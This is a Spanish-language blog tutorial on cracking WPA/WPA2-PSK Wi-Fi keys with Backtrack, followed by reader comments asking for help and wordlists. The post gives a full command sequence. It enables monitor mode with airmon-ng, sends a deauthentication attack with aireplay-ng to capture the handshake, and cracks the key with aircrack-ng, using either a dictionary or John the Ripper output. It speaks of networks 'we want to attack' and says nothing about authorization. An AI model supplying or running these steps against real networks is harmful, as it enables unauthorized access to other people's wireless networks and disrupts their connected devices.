![[A]NTRAX - [L]ABS](http://2.bp.blogspot.com/-fxOPa5Lg1QY/UTACHa0SdAI/AAAAAAAAAb4/5RRZhCuqx-A/s1600/logo%2Bblanco.png)
En este tutorial les enseñare a crackear WPA / WPA2 / PSK desde cero. En la primera parte que fue de como crackear WEPs desde cero vimos como iniciar desde el DVD de Backtrack, por lo tanto arrancaremos con la linea de comandos.
Este tutorial es compatible con cualquier versión del Backtrack.
Colocando nuestra interface en modo monitor:
Primero debemos saber como se llama nuestra interface, para ello tipeamos:
Colocando nuestra interface en modo monitor:
Primero debemos saber como se llama nuestra interface, para ello tipeamos:
aimon-ng
Como vemos en la imagen, mi interface se llama wlan0. Ahora para ponerla en modo monitor tipeamos
airmon-ng start wlan0
Como podemos ver en la imagen 2, nos pone entreparentesis "(monitor mode enabled on mon0)", que sera la que utilizaremos.
Capturando el Handshake
La siguiente linea de comando scanneara las redes cercanas:
airodump-ng mon0
De este paso debemos tener en cuenta el canal, en este caso es 1. El BSSID y la STATION.
Una vez que sale la MAC de la red que deseamos atacar con una estacion, frenamos el scanneo presionando CTRL + C
Ahora tipearemos la siguiente linea:
airodump-ng mon0 --channel 1 --bssid D8:5D:4C:C7:DC:EE -w /tmp/wpa2
aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 70:F1:A1:94:E8:34 mon0
Una vez tipeado esto, podremos ver que apareceran redes en la otra consola y podremos capturar el Handshake.
Como se puede ver en la imagen 8, hemos capturado el Handshake, ahora lo que nos queda es desencriptar la password. Esto se puede hacer de dos formas..
1 - Bruteandola con el Jonh The Ripper
2 - Por medio de Diccionario
En este tutorial veremos las dos Formas
Obteniendo la Clave
Para hacerla por medio de Aircrack utilizando el diccionario que trae Backtrack, tipeamos la siguiente linea:
aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst -b D8:5D:4C:C7:DC:EE /tmp/wpa2*.cap
En este caso estoy utilizando el diccionario que viene con Backtrack. Ustedes pueden utilizar sus propios diccionario y corrigen la ruta del mismo.
Como podran ver, ahi obtuvo la Clave y en este caso es: "thisisatest"
Ahora veamos la forma de hacerlo por medio de John The Ripper.
Tipeamos el siguiente comando:
Backtrack 4:
/pentest/passwords/jtr/john --stdout --incremental:all | aircrack-ng -b D8:5D:4C:C7:DC:EE -w - /tmp/wpa2*.cap
Backtrack 5:
/pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b D8:5D:4C:C7:DC:EE -w - /tmp/wpa2*.cap
Recuerden cambiar la MAC por la que estan atacando y el directorio si es que lo modificaron.
Ambos metodos, tanto por diccionario como por John The Ripper suelen demorar dependiendo la dificultad de la contraseña.
Despedida:
Bueno, espero que les haya gustado y les sirva este tutorial y cualquier duda que tengan pueden postearla en el blog.
Esta algo complicados los pasos,pero muy bien...
ResponderEliminaraunque no es compatible en Todas las tarjetas de Red o si?
Esto me sirve mas que nada el desencriptado lo guardo, saludos
ResponderEliminarEstaría interesante algún link para descargar diccionarios. Un saliudo
ResponderEliminareste articulo esta muy biem pero llo tengo um problema que no se como descargar los dichosos dicionarios ni como guardarlos poque uso bt5 en usb (live)quien me ajuda
ResponderEliminarTengo un problema que no le encuentro solucion y la verdad que me da un dolor terrible de cabeza, el problema es que no reconoce mi tarjeta wifi la cual es la siguiente:
ResponderEliminarDescripción . . . . . . . . . . : Broadcom 802.11n Network Adapter
Fabricante . . . . . . . . . : Broadcom
Proveedor . . . . . . . . . . . : Broadcom
Versión . . . . . . . . . . . : 5.60.350.21
Si alguien pudiera ayudarme, actualmente estoy usando BB (Black Buntu).
Saben como solucionar este problemita?
Men al poner "airmon-ng mon0" no me sale el BSSID y el el STATION en la parte de abajo.... como haria? e.é
ResponderEliminarbuen tutorial espero que me sirva.. es la primero ves que uso backtrack 5
ResponderEliminarNo se puede bajar el pdf de este ni ningún otro tuto, todos están en DepositFiles y todos están eliminados!!
ResponderEliminarAl final del post hay un boton que dice print - pdf, haces click ahi y podes descargarlo en pdf
ResponderEliminarSaludos y gracias por leer mi blog
Estimado Antrax, es posible que compartas un wordlist en espaniol. gracias elmer
ResponderEliminarelmer, gracias por pasarte por el blog, aca te facilito un enlace en el que podras encontrar diccionarios:
Eliminarhttp://underc0de.org/foro/wireless/diccionarios-%28ataque-de-fuerza-bruta%29/
Saludos!
HOLA AMIGO UNA PREGUNTICA YO TENGO ESTA VERSION DE BACKTRACK BT5R1-GNOME-32 Y YO LA MONTO EN UNA USB COMO HAGO PARA COPIAR LOS DICCIONARIOS AL ESCRITORIO Y SI LO TENGO EN EL ECRITORIO COMO SE CUAL ES LA RUTA GRACIAS
ResponderEliminarElegante, ¿pero a quien sacamos de la cripta?. Descifrar por favor.
ResponderEliminarHola que tal. Oye estoy siguiendo tu manual pero al momento de escanear las redes, como me salen bastantes, se llena toda la pantalla y no puedo ver la parte donde muestra la "station" ya que la barra lateral se encuentra hasta abajo y no hay manera de bajarla para poder ver esa informacion. Sabes como le puedo hacer para ver dicha informacion?
ResponderEliminarmuchas gracias de antemano. saludos
hola, podéis volver a colgar el manual en pdf? el link está caido. gracias
ResponderEliminarhi guy but I can't desencrypted, you can help me
ResponderEliminarlo malo de el metodo de diccionario.. es que si el pass no esta en el diccionario.. seria tiempo perdido.
ResponderEliminar